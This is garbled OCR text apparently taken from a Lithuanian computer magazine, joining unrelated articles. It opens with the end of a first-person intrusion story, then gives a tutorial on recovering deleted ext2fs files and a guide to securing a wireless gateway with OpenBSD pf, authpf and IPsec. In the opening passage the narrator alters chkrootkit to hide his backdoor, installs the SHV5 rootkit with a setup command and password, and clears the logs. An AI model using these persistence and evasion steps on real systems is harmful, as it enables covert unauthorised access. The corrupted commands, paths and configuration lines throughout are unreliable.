likti gerą daiktą likimo valiai, todėl aš nusprendžiau įtvirtinti 
savo pozicijas. Aš šiek tiek pakoregavau chrootkit kodą, kad 
jis nematytų mano bekdoro, ir į nulaužtą mašiną įdiegiau 
SHV5: 


setup hackergwerty 31337 


Po to aš vėl išvaliau visus logus, pašalinau laikinas bylas, 
patikrinau netstat sąrašus ir nuėjau miegoti. Dabar jau turė- 
jau puikų placdarmą tolimesnėms atakoms, kurio aš, be jo- 
kios abejonės, niekada nenaudosiu, kadangi gerbiu mūsų 
įstatymus ;) 
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pašalintų bylų gimimas 
PAŠALI NTŲ BYLŲ ATSTATYMUI SKIRTA DAU- 
GYBĖ ĮRANKIŲ, TAČIAU TOLI GRAŽU NE VL- 
SI (IR NE VISADA) JIE VEIKIA TAIP KAIP IŠ 
JŲ TIKIMASI. KUR KAS PATIKIMIAU (IR ĮDO- 
MIAU) DUOMENIS ATSTATINĖTI RANKINIU 
BŪDU. DABAR MES PASINERSIME Į FAILŲ 
SISTEMOS EXT2FS PASAULĮ IR PAŽIŪRĖSI- 
ME, KAS PRIVERČIA JĮ SUKTIS. 


BT- Geras.com 


Atstatom duomenis „Linux“ sistemoje 
[Įvadas] Kodėl žūsta bylos? Tokia jau jų karma. O jeigu rimtai, 
tai tam yra tūkstančiai priežasčių nuo virusų iki žmogiškojo 
faktoriaus (kitaip tariant, kreivų rankų daromų klaidų). Pagrindi- 
niu bendravimo su vartotoju būdu Linux sistemoje lieka koman- 
dinė eilutė, lengvai pašalinanti viską be aiškinimųsi. Tereikia jai 
duoti šiek tiek neteisingą įsakymą ir... Kur dingo visos Mano 
bylos? MS-DOS sistemoje buvo nuostabus įrankis undelete, su 
kuriuo buvo galima reguliariai iš nebūties ištraukti daugybę me- 
gabaitų duomenų. Populiarioje programoje Midnight Comman- 
der taip pat yra panaši komanda. Deja, ji suveikia ne visada 
(arba aptinka ne visas bylas), o tada tenka griebtis rankinio 
atstatymo. Nesijaudink! Tai kur kas paprasčiau, nei gali pasiro- 
dyti neprityrusiai akiai! 


[Failų sistemos struktūra) Priešingai nei Windows NT, kuri 
suderinama tik su NTFS ir FAT, Linux šeimos operacinės siste- 
mos siūlo gana platų failų sistemų asortimentą bet kokiam sko- 
niui: ext2fS, ext3f5, reiserfs, xfs, įfs. Ju „vartotojiškos“ galimy- 
bės išoriškai panašios, bet „fizinė“ struktūra smarkiai skiriasi, 
todėl kiekviena iš jų reikalauja savo atstatymo technikos. Vie- 
name straipsnyje visa tai aprėpti tiesiog nerealu, todėl mes nu- 
sprendėme apsistoti ties ext2f5/ext3fs, kadangi ji yra pati po- 
puliariausia failų sistema, pagal nutylėjimą diegiama daugelyje 
Linux distributyvų. Faktiškai ext3fs — tai ext2fs su žurnalizavi- 
mo palaikymu. Pagrindinių struktūrų skirtumai minimalūs, ta- 
čiau bylų šalinimo procesas jose atliekamas skirtingai. Šalinant 
bylą ext2fs sistemoje, trinamas jos pavadinimas (nors iki tam 
tikro laiko tai dar nėra padaroma), todėl automatinis vardų at- 
statymas joje neįmanomas, bet pats bylos turinys lieka nepa- 
liestas. Ext3fs elgiasi visiškai priešingai — išsaugo bylos pava- 
dinimą, tačiau dalinai sunaikina jo patalpinimo diske schemą, 
dėl ko atstatymo technika kolosaliai apsunkinama. Be to, ext3f5 
taip pat ne tokia naši, todėl namų kompiuteriuose geriausia 


naudoti ext2fs. Kokia šios failų sistemos struktūra? 

Particijos pradžioje yra boot sektorius, o už jo, t.y. už 1024 
baitų (poslinkis nuo particijos pradžios) yra superblokas (super- 
block), atsakantis už esminės informacijos saugojimą apie failų 
sistemos struktūrą (ext2fs/ext3fs sistemose jis atlieka tą patį 
vaidmenį, kaip ir boot sektorius FAT ir NTFS sistemose). Super- 
bloke daug įvairių laukų, tačiau mus domins tik vienas: 
s log block size. Tai 32 bitų laukas, esantis už 18h baitų po- 
slinkio nuo superbloko pradžios. Kaip iš karto pasako jo pavadi- 
nimas, jis apibrėžia vieno bloko dydį, kas MS-DOS/Windows 
terminologijoje vadinama klasteriu. Dydis nurodomas laipsniu, 
kuriuo paslenkamas vieno 200h (512) baitų užimančio sekto- 
riaus dydis. Išvertus į programuotojo kalbą visa tai skambėtų 
taip: block size = 200h << s log block size. Pavyzdžiui, jei- 
gu s log block size bus lygus nuliui, tai vieno bloko dydis bus 
400h baitų, t.y. du sektoriai. 

Už superbloko eina grupių deskriptoriai ir laisvos disko erdvės 
žemėlapiai, paprasčiau šnekant — bitmapai, kurie mus men- 
kai domina, o su jais besiribojančią inode lentelę mes aptarsi- 
me detaliau, kadangi nežinant jos struktūros rankinis duomenų 
atstatymas tiesiog nesuvokiamas. /node lentelė iš tikrųjų yra 
inode tipo įrašų masyvas, kuriame kiekvienas įrašas saugo visą 
informaciją apie vieną bylą. Tokiame įraše apibrėžiamas tipas 
(paprasta byla, katalogas, simbolinė nuoroda ir t.t.), patalpini- 
mo diske schema, loginis/fizinis dydis, sukūrimo/modifikacijos/ 
paskutinio priėjimo/pašalinimo data/laikas, nuorodų į bylą skai- 
čius ir priėjimo teisės: 


„Inode“ atvaizdavimo formatas (poslinkis, dydis, aprašymas) 


0 2 i mode ; atvaizdavimo formatos 
2 2 i uid ; vartotojo vid 
4 4 i size ; bylos dydis baitais 
8 4 i atime ; paskutinio priėjimo prie bylos laikas 
12 4 i ctime ; bylos sukūrimo laikas 
16 4 i mtime ; bylos modilikavimo laikas 
20 4 i dtime ; bylos pašalinimo laikos 
24 2 i gid ; grupės gid 
26 2 i links count 
; nuorodų į bylą skaičius (0 — byla pašalinta) 
28 4 i blocks 
; bylai priklausančių blokų kiekis 
32 4 i flags ; įvairios vėliavėlės 
36 4 i osdl ; nuo OS tipo priklausanti reikšmė 


; 12 DIRECT BLOCKS 
(nuorodos į pirmus 12 bylos blokų) 


4012x4i block 


88 4 i iblock ; 1x INDIRECT BLOCK 
92 4 i 2iblock ; 2x INDIRECT BLOCK 
96 4 i Biblock ; 3x INDIRECT BLOCK 
100 4 i generation 
; bylos karta (naudojama NFS) 
104 4 i file ad ; išoriniai atributai 
108 4 i dir ad ; didžiausias dydis 
12 4 i faddr ; paskutinio fragmento vieta 
16 12 i 0sd2 ; OS tipo priklausanti reikšmė 


Bylos išdėstymo diske schema čia suorganizuota kur kas pa- 
prasčiau, nei NTFS ir FAT sistemose. Kiekviena byla užima vie- 
ną arba keletą blokų. Net jeigu blokas užimtas dalinai, bylai jis 
išskiriamas pilnai (likusiose failų sistemose, pavyzdžiui, UFS, 


BT- Geras.com 


Corimand 


Directory trae 

Find file 
„Mi sHap panels 
bin switch Panels on/off 
boot Compare directories 
deu eXternal paneliza 
s!zes 


ali show directory 


Kumo 
lib 

“lost +found 
mn 


cormand HNistorų 
dilectorų hotlist 
Active UFS list 
Froe UFSS now 
Vackground job: 


opi 

“proc 
root 
bin ulteletė filė 

tp 

Extension file Edit 

file edit 

ediTor edit 


us r 
Menu 
Menu 


Automatinis pašalintų bylų atstatymas su Midnight Commander priemonėmis 


numatyta galimybė bylai išskirti tiktai bloko dalį, o NTFS ir Rei- 
serFS sistemose mažos bylos gali būti saugomos tiesiog pačia- 
me inode, kas smarkiai sumažina fragmentaciją ir padidina na- 
šumą), bet grįžkime prie ext2fs/ext3fs. Rodyklės į bylos užima- 
mus pirmus 12 blokų saugomi pačiame inode, o tiksliau šne- 
kant, DIRECT BLOCKS masyve, kuris taip pat vadinamas tie- 
sioginių blokų masyvu. Kiekvienas masyvo elementas yra 32 
bitų bloko numeris. Kadangi tipiškas bloko dydis yra —4 Kb 
(konkreti reikšmė priklauso nuo disko talpos ir formatavimo 
opcijų), tai tiesioginių blokų masyvas „suvirškina“ iki 4*12 = 
48 Kb dydžio bylas. Jeigu bylos dydis viršija šį dydį (kas teisin- 
ga triuškinančiai daugumai bylų), tenka pasinaudoti netiesio- 
ginio adresavimo blokais. 

Ext2fs/ext3fs failų sistemos atpažįsta tris vieno | kitą įdėjimo 
lygius. Pirmasis netiesioginio adresavimo blokas jau saugo ne 
rodykles į bylos užimtus blokus, o rodykles į papildomus tiesio- 
ginius blokus, todėl taip galima adresuoti iki BLOCK SIZE/size- 
of(DWORD) * BLOCK SIZE = 4096/4*4 Mb duomenų. Ką gi! 
Prieš pusę amžiaus tai buvo labai didelis dydis, tačiau dabar 
tuo jau nieko nenustebinsi. Tam atvejui numatytas dvigubo ne- 
tiesioginio adresavimo blokas, saugantis rodykles į netiesiogi- 
TTT TTT TT || 
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Pašalintų bylų atstatymas Iš ext2fs particijos su Windows sistemai skirtu irankiu R. Studio 
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nius blokus, kuriuose saugomos nuorodos į tiesioginius blokus, 
kas leidžia adresuoti (BLOCK SIZE/sizeof(DWORD))**2 * 
BLOCK SIZE = 4096/4 ** 4096 = 4 Gb duomenų. O tai jau 
įspūdinga apimtis, kuomet bylos dydis užima visą 32 bitų kinta- 
mąjį. Daugelis programų viršutinę apdorojamų bylų ribą apribo- 
ja iki 2 arba 4 Gb. Nepaisant to, failų sistema gali saugoti ir 
didesnes bylas. Tai atliekama su trigubo netiesioginio adresavi- 
mo bloku, kuris rodo į dvigubą netiesioginį bloką, kiekvienas 
kurių rodo į netiesioginius blokus, rodančius į tiesioginio adre- 
savimo blokus. Taigi ext2fs/ext3fs galimybės smarkiai viršija da- 
bartinių ir ateities kietųjų diskų talpas. 

Lyginant su FAT, tokia informacijos saugojimo apie patalpinimą 
schema yra kur kas atsparesnė sutrikimams. Informacija taip 
lyg ir „ištepliojama“ po visą diską, todėl visus adresavimo blo- 
kus sunaikinti galima nebent dinamitu. Be to, blokų numeriai 
saugomi tiesioginiu pavidalu (t.y. taip, kaip yra), o tai reiškia, 
kad kiekvienam bylos blokui galima greitai surasti jį atitinkantį 
netiesioginį bloką, net jeigu inode visiškai sunaikintas. 

Bylų pavadinimai saugomi kataloguose, inode jų nėra. Katalo- 
gai iš tiesų yra specialios tarnybinės bylos, saugančios tokio 
tipo įrašų masyvą: 


Kotologų masyvo formatas (poslinkis, dydis, aprašymas) 
( 4 oroda į inode 


4 2 rec len įrašo ilgis 


iInode 


- bylos pavadinimo ilgis 
bylos tipūs 
bylos pavadinimas 


name len 


file type 
B IyUo 


8 name 


Lauke inode saugomas inode eilės numeris, kurį atitinka šis 
bylos pavadinimas; rec /en apibrėžia einamo įrašo ilgį, o na- 
me len bylos pavadinimo ilgį. Pats pavadinimas saugomas 
ASCII formatu. 


[Kas vyksta šalinant bylą] Šalinant bylą sistemoje vyksta dau- 
gybė pasikeitimų. Aprašysime tik svarbiausius iš jų. Visų pirma, 
sistema nustato jai priklausančio inode numerį. Po to nuorodų 
skaičius sumažinamas vienetu, ir jeigu ši reikšmė nepasidaro 
lygi nuliui, tai šalinimas neįvyksta, kadangi byla dar turi likusių 
nuorodų. Mūsų šis atvejis nedomina. Jeigu nuorodų daugiau 


šoninis Ide redaktonaus vaizdas 


nėra, tai visi anksčiau bylai priklausę blokai laisvos erdvės že- 
mėlapyje pažymimi kaip nenaudojami, atnaujinamas pašalini- 
mo laiko laukas, o pats inode atlaisvinamas, kas realizuojama 
modifikuojant inode bitmap. Be to, ext3fs sistemoje nunulina- 
mos rodyklės į 12 tiesioginio adresavimo blokus ir 3 netiesiogi- 
nio adresavimo blokus, dėl ko bylos išsidėstymo schema yra 
dalinai prarandama. Katalogų bylai šie pasikeitimai taip pat turi 
įtakos. Ext2f5 nunulina /node lauką ir padidina prieš tai buvusio 
įrašo reikšmę pašalinamo įrašo dydžiu. Prieš tai buvęs įrašas 
lyg ir „praryja“ tolimesnį, o ryšys tarp bylos pavadinimo ir jį ati- 
tinkančio inode negrįžtamai prarandamas. Tai reiškia, kad mes 
galime atstatyti bylą, tačiau neįmanoma sugrąžinti prieš tai bu- 
vusio pavadinimo. Tiesa, galima gauti visų pašalintų objektų 
pavadinimų sąrašą, 0 po to vienaip ar kitaip pabandyti atspėti 
reikiamą pavadinimą. Tai suveikia atstatant nedidelį bylų kiekį, 
tačiau jeigu pašalintas visas šakninis katalogas, tai situacija 
tampa beviltiška. O ext3f5 inode lauką palieka nepakeistą, dėl 
ko pavadinimo atstatymas yra elementarus. Problema tame, 
jog ext3fs sistemoje prarandama bylos išdėstymo diske sche- 
ma, kas ypatingai apsunkina jos turinio atstatymą. 


[Pasiruošimas atstatymui] Jeigu tu ka tik pašalinai byla, tai 
geriausias atstatymo būdas bus RESET. Aš labai rimtai! Siste- 
ma disko buferius įrašo ne iš karto, o tik po tam tikro laiko, 
todėl laiku įvykdytas perkrovimas arba maitinimo atjungimas da- 
linai išgelbėja situaciją. Po perkrovimo byla pasirodo besanti 
sveika ir nesugadinta. Tiesa, pačiame diske dėl to gali susidary- 
ti Žymių pažeidimų, todėl nepalankios baigties rizika labai dide- 
lė, taigi geriau būtų pasinaudoti tradicinėmis atstatymo prie- 
monėmis. 

Visų pirma išmontuok reikiamą disko particiją arba permontuok 
ją „tik skaitymui“. Aktyvių particijų gydymas paprastai baigiasi 
labi liūdnai. Jeigu atstatomos bylos yra sisteminėje particijoje, 
galima pasinaudoti LiveCD. Geriausia būtų pasinaudoti Knop- 
pix. Jam tinka daug skirtingos įrangos, nereiklus resursams ir 
turi visus atstatymui reikalingus įrankius. 

Tiesiogiai redaguojant diską jį lengva sugadinti. Vienas netei- 
singas rankos judesys ir gigabaitai duomenų pavirsta į pelė- 
nais. Taigi turint diske laisvos vietos, rekomenduojama padaryti 
atstatomos particijos kopiją, o visus tolimesnius bandymus at- 
likinėti būtent su ja. Windows pasaulyje šiuo tikslu naudojami 
specialūs įrankiai (pavyzdžiui, Norton Ghost), tačiau Linux - 
visai kas kita. Čia visi reikiami įrankiai yra po ranka. Particijos 
kopiją lengviausia sukurti su komanda cp /dev/sdb1 dump, kur 
sdb1 įrenginio pavadinimas, 0 dump bylos, į kurią kopi- 
juojama visa particija, pavadinimas. Tokia bylą galima įkurdinti 
bet kurioje kitoje laisvoje particijoje arba perkelti į kaimyninę 
tinklo mašiną. Visi darbo su diskais įrankiai (/Ide, debugsf, fschk) 
nepastebės apgaulės ir su šia particija dirbs kaip su „gimtąja“. 
Ją net galima sumontuoti kaip failų sistemą: Mount dump 
mount point -o loop. Taip galima įsitikinti, jog atstatymas buvo 
atliktas sėkmingai. Komanda cp dump /dev/sdb1 atstatytą by- 
lą-particijos kopiją kopijuoja atgal į tikrąją particiją. 
Linuksoidai diskus dažniausiai redaguoja su Ide (Linux Disk Edi 
tor), kuris yra profesionalus konsolinis redaktorius, sugebantis 
susidoroti su ext2fs, minix, xiafs sistemomis ir dalinai FAT. Jis 
nemokamas, platinamas su išeities tekstais (Ide.sf.net), veikia 
praktiškai bet kurioje *nix sistemoje. 


ĮRankinis duomenų atstatymas diskų redaktoriumi] Kaip 
su juo dirbti? Iš pradžių atidarome atstatinėjamą particiją arba 
(file-dump); Ide /dev/sdb1 arba Ide dump. Lde savarankiš- 
nustato failų sistemos tipą ir po bet kurio klavišo paspaudi- 
mo pereina į superbloko atvaizdavimo režima. Dabar klavišas 

I> mus perveda į inode režimą, o <B> — į blokinį režimą. 
Spaudžiam <!>, ir redaktorius pereina prie pirmojo inode, ku- 
ris priklauso šakniniam katalogui. Perėjimui prie tolimesnio inode 
skirtas klavišas <Page Down >, atitinkamai <Page Up> perei- 
na prie ankstesnio inode. Taip galima pereiti per visus inode. 
Kaip atskirti, kurie iš jų priklauso pašalintoms byloms? Čia mums 
padės laukas LINKS. Jeigu byla pašalinta, tai jis bus lygus nu- 
iui, o tada DELETION TIME įrašomas paskutinio pašalinimo lai- 
(juk Mes pamename, kada ištrynėme bylą?). Gera idėja — 
nuskenuoti inode lentelę ir surūšiuoti visas bylas pagal pašali- 
nimo laiką. Paskutinės pašalintos bylos atsidurs sąrašo gale. 
Pašalinimo datos taip pat galima ieškoti su kontekstine paieš- 


DyIa 
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Kas 


Aptikus reikiamą kursorių perkeliame prie pirmojo DI- 
RECT BLOCKS sarašo bloko (kur jis pagal nutylėjimą ir atsidu- 
ria) Ir spaudžiam <F2 Pasirodžiusiame meniu išsirenkame 
punktą Block mode, viewing block under cursor (beje, čia gali 
ma patekti ir su <Shift-B> klavišų kombinacija). Redaktorius 
nus perkelia į pirmąjį pašalintos bylos bloką. Peržiūrėdami jos 
turinį hex režime, bandome „iš akies“ nustatyti, ar tai bent kiek 
panašu į mūsų bylą, ar ne? Norint sugrįžti į /node sąrašo peržiū- 
rą, reikia nuspausti <!>, norint atstatyti byla: <Shift-R>, po 
kartą <R> ir naujos bylos pavadinimą. Viskas! Byla at 


Inode, 


to dar 
tyta! 
Kai kuriais atvejais bylas geriau atstatinėti pagal jų turinį. Tai 
kim, pašalintoje byloje buvo eilutė „hello, world“. Spaudžiam 
f> (search), o po to <A> (Search all block). Jeigu pamirši 


nuspausti <A>, tai redaktorius praleis pašalintoms byloms pri- 
lausančius blokus, o tai tikrai neįeina į mūsų planus. 
Dabar spaudžiam <B kad pervestume Ide į block-mode, 


spaudžiam ir įvedame ieškomą eilutę ASCII formatu. 
Siek tiek padrožęs kietąjį diską, redaktorius suranda reikiamą 


taūa 


En 
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de turinio peržiūra 
bloką. Žiūrim, ar tai iš tiesų tas blokas, kurio mums ir reikia, ar 
įvyko nesusipratimas (klaidingas suveikimas). Jeigu blokas iš 
tiesų mūsų, tuomet spaudžiam < Ctrl po ko redaktorius 
praneša inode numerį, kuriam priklauso šis blokas (jis atvaiz- 
duojamas ekrano apačioje, nesupainiok jo su paskutinio per 


kuris atvaizduojamas viršuje). Klavišas 
po ko telieka nuspausti < £ 


žiūrėto inode numeriu, 
<!> mus perveda į inode režimą, 


ir įvesti inode numerį, kurį mes norime peržiūrėti. Jeigu pašali 
nimo data mums atrodo teisingai, tuomet spaudžiam < Shift 
R>/<R> ir perkeliame bylą į diska. Visa tai veikia tik su ext2fs 


ir netinka ext3f5, kadangi, kaip aš jau minėjau, pastaroji failų 
sistema ištrina bylų išdėstymo diske schemą, po ko duomenis 
tenka atstatinėti tiesiogine žodžio prasme po gabalėlį 

[Pabaiga] Rankinis bylų atstatymas ext2fs sistemoje visiškai 
nesudėtingas dalykas, kurį gali išmokti bet kas. Duomenų at- 
statymas — tai menas, kurio mokomasi metų Metus, jeigu Lik 


nepristinga noro. 
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NESUNKU ĮSIVAIZDUOTI, KOKIŲ NUOSTO- 
LIŲ GALI PRIDARYTI PIKTAVALS, PRASI- 
SKVERBĘS | NEAPSAUGOTĄ BELAIDĮ TIN- 
KLĄ. IR VISIŠKAI NESVARBU, AR ŠIS TIN- 
KLO SEGMENTAS PRIKLAUSO STAMBIAI 
KOMPANIJAI, UNIVERSITETO FAKULTETUI, 
AR EILINIAM VARTOTOJUI — PASEKMĖS GA- 
LI BŪTI KATASTROFIŠKOS. IŠEITIS VIENA: 
PAŠALINTI NESANKCIONUOTO PRIĖJIMO IR 
KONFIDENCIALIOS INFORMACIJOS NUTE- 
KĖJIMO GALIMYBĘ, UŽTIKRINANT PATIKIMĄ 
IR TUO PAČIU LANKSČIĄ APSAUGĄ. BET 
KAIP TAI PADARYTI, KAI BET KURIS PAGEI- 
DAUJANTYSIS GALI PASINAUDOTI KRIPTOG- 
RAFINIU WEP SILPNUMU, NAUJI SAUGU- 
MO MECHANIZMAI WPA/MVPA2 KOL KAS 
DAR NĖRA PLAČIAI PAPLITĘ, O APARATINIŲ 
VPN SPRENDIMŲ KAINA ARTĖJA PRIE BE- 
GALYBĖS. 


Tobula belaidžio tinklo apsauga 

[Dygliuotos žuvytės vaidmuo skęstančių gelbėjime] Šiuo 
metu vis daugiau nešiojamųjų ir delninių kompiuterių Modelių 
aprūpinami IEEE 802.11 standarto belaidžio tinklo adapteriais. 
Atrodytų, apie tokį įvykių plėtojimąsi buvo galima tik pasvajoti. 
Tačiau ši tendencija turi ir kitą medalio pusę patogumas ir 
mobilumas saugumo klausimus švelniai nustumia į antrą pla- 
ną. Ši problema tokia opi, jog ji gali apskritai rimtai pristabdyti 
triumfuojantį skaitmeninių technologijų žygį į prieki. Tai puikiai 
suprato OpenBSD kūrėjai, kurdami įrankiu authpf, isakmpd, 
openssh ir pf sąsają, kuri leidžia ne tik kriptografiškai stabiliai 
šifruoti perduodamus duomenis, bet ir autentifikuoti klientą su 
slaptažodžiu arba pagal viešą raktą. 


[Brainstorm: fortifikacijos ypatumai] Aptarsime varianta, 
kuomet vietoje laidinį ir belaidį tinklus apjungiančio šliuzo vei- 
kia kompiuteris su OpenBSD 3.8 sistema. Be pirminio aukš- 
čiau išvardintų programinių priemonių rinkinio, šio pasirinkimo 
labui byloja ir tai, jog /PSec realizacija tiek operacinės siste- 
mos branduolyje, tiek ir vartotojo erdvėje įgyvendinta (neper- 
dedant) aukščiausiame lygyje. Skubu nuraminti OpenBSD opo- 
nentus — FreeBSD, NetBSD ir DragonflyBSD konfigūravimas 
skiriasi minimaliai. 


[ LAN ]-— ————-(fxp0) 
V 
[ GATEWAY |-(fxp1)—--[ ISP ] 
/ 

[ LAPTOP ] — - — (ral0) 


Pateiktame scenarijuje ra/O tai tinklo sąsaja, susieta su PCI 
tinklo plokšte Gigabyte GN-WPKG 802.11 b/g (—258) ir dir- 
bantis pagal 802.11g (mode 11g) specifikaciją per 11 dažnio 
kanalą (chan 11) priėjimo taško režime (mediaopt hostap) su 
unikaliu tinklo identifikatoriumi (nwid wlan): 


24 vi /et/hostname.ral0 
inet 192.168.2.1 255.255.255.0 NONE media autoselect mode 11g 
mediaopt hostap nwid wlan chon 11 


Prieinamų tinklo sąsajų sąrašas 


Siūlau veikti taip: jeigu pas belaidį klientą (testuojama buvo 
nešiojamajame kompiuteryje su WinXP SP2) atitinkamai sukon- 
figūruota /PSec politika, visas vidinis tinklo srautas bus šifruoja- 
mas sukuriant /PSec tunelį su autentifikacija pagal žinomą slaptą 
frazę (nuo šiol „preshared key“ vadinsime būtent taip, kad iš- 
vengtume painiavos su kitais raktais); vos tik iš vartotojo pusės 
bus atlikta autentifikacija su ssh klientu, šliuze automatiškai 
įsigalios asmeninės ugniasienės taisyklės ir vartotojas priklau- 
somai nuo jam suteiktų privilegijų gaus pilną arba apribota pri- 
ėjimą prie tinklo. 


[„OpenSSH“: pirmasis blokpostas] Nepaisant to, jog nemo- 
kamai platinamas OpenSSH paketas pastaraisiais metais sėk- 
mingai susidorojo su apsaugoto priėjimo suteikimu iš nutolusių 
kompiuterių, jis su nustatymais pagal nutylėjimą negali užtikrin- 
ti reikiamo saugumo lygio. Norint apsunkinti hakerio, kuris ban- 
do perimti ssh sesiją ir ja pakeisti, ataką, reikia pakeisti kai 
kurias pagal nutylėjimą sukonfigūruotas sshd(8) kintamųjų reikš- 
mes. Pakeitę šiuos nustatymus mes būsim tikri, kad vos tik 
vartotojo aplinka gaus atitinkamą signalą, autentifikuoto varto- 
tojo ssh sesija bus užbaigta tvarkingai, dėl ko susijungimų bū- 
sena nebus išsaugota ugniasienės įrašų lentelėje. 


2 Vi /ety/ssl/sshd config 

/* Darbas per SSH2 protokolą privalomas */ 

Protocol 2 

/* Mes nenaudosime IPv6 */ 

AddressFomily inet 

/* Laukiam prisijungimo per beloidę tinklo sąsajų */ 

ListenAddress 192.168.2.1 

/* Uždraudžiam jungtis supervartotojoms */ 

PermitRootlogin no 

/* Panaudodami SSH2 ir šias dvi opcijos, mės apsunkiname ARP ir IP-spoofing tipo atakas 


(lientAlivelnterva! 15 

(lientAliveČountMax 3 

/* |jungtas UseDNS sukelia daugiau problemu, nei išsprendžia */ 
UseDNS no 

/* Apibrėžiame priėjimo kontrolės sąrašus */ 

AllowGroups wheel wstc users authpf 


Išsaugoję pakeitimus, nurodome demonui iš naujo perskaityti 
konfigą: 


+ kill -HUP "sed ą /var/tun/sshd.pid“ 


[„Pf“: švartavimasis „hotspot'ų“ seklių vandenyne] Mes jau 
seniai pripratome, kad ugniasienė dirba su statiniu taisyklių rin- 
kiniu. Ir iš tiesų, daugeliui užduočių to kuo puikiausiai pakanka. 
Tačiau kai tinkle atsiranda daug siurbiantys vartotojai ir/arba 
belaidžiai klientai, tokia darbo schema sugriūna kaip kortų na- 
melis. Viena iš nuostabių pf(4) galimybių yra ta, kad prie pa- 
grindinio konfigo pf.conf(5) papildomus taisyklių rinkinius gali- 
ma prijungti veikimo metu (on the fly). Už šią galimybę atsako 
taip vadinami inkarai (anchor), kurių darbą galima pademonst- 
ruoti kovinėmis sąlygomis: 


Ž Vi /etų/pl.conf 
/“ Apibrėžiome makrosus */ 


enc = end)" 
int if = "ralO" 


/* Aktyvuojame taisyklę tinklo adresų transliavimui */ 
nat-anchor “authpt/*" 


/* Aktyvuojame taisyklę korektiškam ftp ir p2p klientų darbui */ 
rdr-anchor “authpĖ/*" 


/“ Leidžiom ir registruojam priėjimą prie sshd (22/tcp), isakmpd (500/udp) */ 
pass in log gvick on Sint if inet proto tep from Sint if:network ) 

to Sint if port ssh keep state 

pass in log guick on Sint if inet proto udp from Sint if:network | 

to Šint if port isokmp keep stote 


/* Pialeidžiame šifruotą tinklo stautą */ 

pass in guick on Sint if inet proto esp from Sint if:network to Šint il 
pass in guick on Šenc if inet proto ipencap from Sint if:network to Sint If 
pass in guick on Senc if inet from Šint iknetwork to Šint if keep state 


/* Praleidžiame išeinanti tinklo srauto */ 
pass out guick on Sint if inet from any to Sint iknetwork keep state 


/* Aktyvuojame asmenines vartotojų taisykles */ 
anchor "authpi/*" 


[„authpf“: pageidavimų išsipildymas] Ne paslaptis, jog 
šifravimo protokolas WEP atlieka įrenginio, o ne vartotojo 
autentifikaciją. Šis trūkumas buvo įvertintas kuriant 
authpf(8) — ypatingą pseudoaplinką, kuri dinaminiu reži- 
mu autentifikuotam vartotojui keičia ugniasienės taisyk- 
les. Kitaip tariant, įvedus slaptažodį tu neįjeini į sistemą, 
vietoje to įsigalioja asmeninės ugniasienės taisyklės. Authpf 
konfigūravimas nėra paprastas, todėl ties juo apsistosiu 
išsamiau. 

Iš pradžių praplečiam prieinamų komandinių interpretatorių sąrašą: 


4 echo “/usi/sbin/authpt" > > /etc/shells 
Į bylos /ogin.conf(5) pabaigą įtraukiame duomenis apie nauja 


klasę wifi, kurios vartotojai vietoje standartinio shello gaus 
authpf. 


Modifikuojame ugniasienės taisykles 
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2 Vi /et(/login.conf 

wiliA 
:shell= /us:/sbin/authpf:) 
= default: 


Atnaujiname hešuotą duomenų bazę /etc/login.conf.db: 
2 cap mkdb /etC/login.conf 


Visai nebūtina keisti inkaro (anchor= "authpf") ir radikso Iente- 
lės (table="authpf users") reikšmių pagal nutylėjimą, todėl / 
etc/authpf/authpf.conf paliekame tuščią: 


+ touch /et/authp[/authpt.conf 
Paruošiame /etc/motd analogišką pasisveikinimą: 
2 echo "Please play nice.“ > /et(/authp[/authpf.message 


Sukuriame bylą su ugniasienės taisyklėmis, kurios bus užkrau- 
namos PO Lg, (čia toks sumažintas šriftas ir turi būti, ar čia 
kas nors nušokę?) belaidžio kliento autentifikacijos ir deakty- 
vuojamos gavus SIGINT signalą (nuspaudus klavišų kombinaciją 
<Ctrl-C>): 


* Vi /et/authpl/outhpt.1ules 

/* Naudojami makrasai */ 

at i = "pl" 

int if = "ralO" 

/“ | internetą išleidžiame autentifikuotus vartotojus */ 


nat on Šext if inet from Suser ip to any tag Suser ip -> (Sex II) 


/* Užtikriname korektišką darba FTP protokolu */ 
tdr on Sint if inet proto tep from Suser ip to any port 21 M 
<> 127.0.0.1 por 802) 


/* Logiškas pirmosios taisyklės užbaigimas — praleidžiame paketus */ 


MS mums ellinį kartą pademonstravo elegantšką požiūrį į užduočių sprendimą. 


pass in gvick on Sint if inet from Šuser ip to Ony 
pass out log gvick on Šext if inet tagged Suser ip kegp state 


Pastaba: naudojant rezervuotus makrosus $user id ir Suser ip, 
automatiškai bus atliekamas prisijungusio vartotojo vardo ir IP 
adreso pakišimas. Kataloge /etc/authpf/users/$USER galima pa- 
ruošti ypatingą asmeninių (ne)privilegijuotiems vartotojams skirtų 
taisyklių rinkinį. Tai mums suteikia beribes fantazijos skrydžio 
platybes: apriboto/pilno priėjimo prie interneto suteikimas, de- 
militarizuotos zonos ir/arba uždarų tinklo segmentų sukūrimas, 
įeinančio/išeinančio TCP/UDP tinklo srauto nukreipimas ir t.t. 
Pavyzdžiui, geram ir nusipelniusiam vartotojui Jonui suteiksime 
papildomą galimybę bet kuriame eD2k serveryje gauti High ID. 
Tam reikia sukurti bylą /etc/authpf/users/jonas/authpf.rules, kuris 
būtų identiškas /etc/authpf/authpf.rules, o po to į jį pridėti ke- 
letą magiškų nukreipimo taisyklių. 


7 mkdir -p /ett/authpĖ/users/jonas 
* (p /etlauthpt/authpf.tules /etc/authpf/users/jonos/authpt.1ules 


Ž vi /etl/authpt/users/jonas/authp.rules 

Įsnip] 

tdr pass on Šext If inet proto tep from any to any port 4661 > Suser ip 
rar pass on Šext If inet proto tcp from any to any port 4662 -> Suser ip 
tdr pass on Šext if inet proto udp from any to any port 4665 -> Suser ip 
tdr pass on Šext if inet proto udp from any to ony port 4672 -> Suser ip 
Įsnip] 


[„Isakmpd“: „IPSec“ tunelių įmantrybės] Kaip mes pame- 
name, pagrindiniai WEP trūkumai buvo aptikti autentifikacijos ir 
šifravimo procedūrose. Be to, paaiškėjo, kad šis mechanizmas 
gali būti panaudotas tik mažuose tinkluose su saikingu tinklo 
srautu. Iš to išplaukia, kad net jeigu jis būtų vienintelis standar- 
tas de facto, kuris garantuoja belaidžių tinklų saugumą, jo ne- 
būtų galima panaudoti korporatyviniams sprendimams. 
Isakmpd(8) užtikrina darbą apsikeitimo slaptais raktais proto- 
kolu (ISAKMP), susidoroja su bet kokiais apkrovimais be našu- 
mo sumažėjimo, taip pat leidžia kurti neįtikėtiną /PSec tunelių 
